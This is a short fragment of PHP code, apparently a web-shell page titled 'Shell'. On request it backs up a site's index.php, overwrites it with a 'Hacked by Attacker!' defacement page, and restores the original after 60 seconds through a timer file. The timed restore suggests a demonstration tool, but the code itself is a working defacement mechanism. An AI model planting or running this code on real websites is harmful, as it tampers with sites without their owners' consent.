Hacked by Attacker!

Defaced for 60 seconds!

"; } if (isset($_POST['overwrite'])) { if (file_exists($index_file)) { copy($index_file, $backup_file); } file_put_contents($index_file, get_defaced_content()); file_put_contents('restore_time.txt', time() + 60); echo "

Defaced! Check index.php.

"; } if (file_exists('restore_time.txt')) { $restore_time = (int)file_get_contents('restore_time.txt'); if (time() >= $restore_time && file_exists($backup_file)) { copy($backup_file, $index_file); unlink($backup_file); unlink('restore_time.txt'); echo "

Restored!

"; } } ?> Shell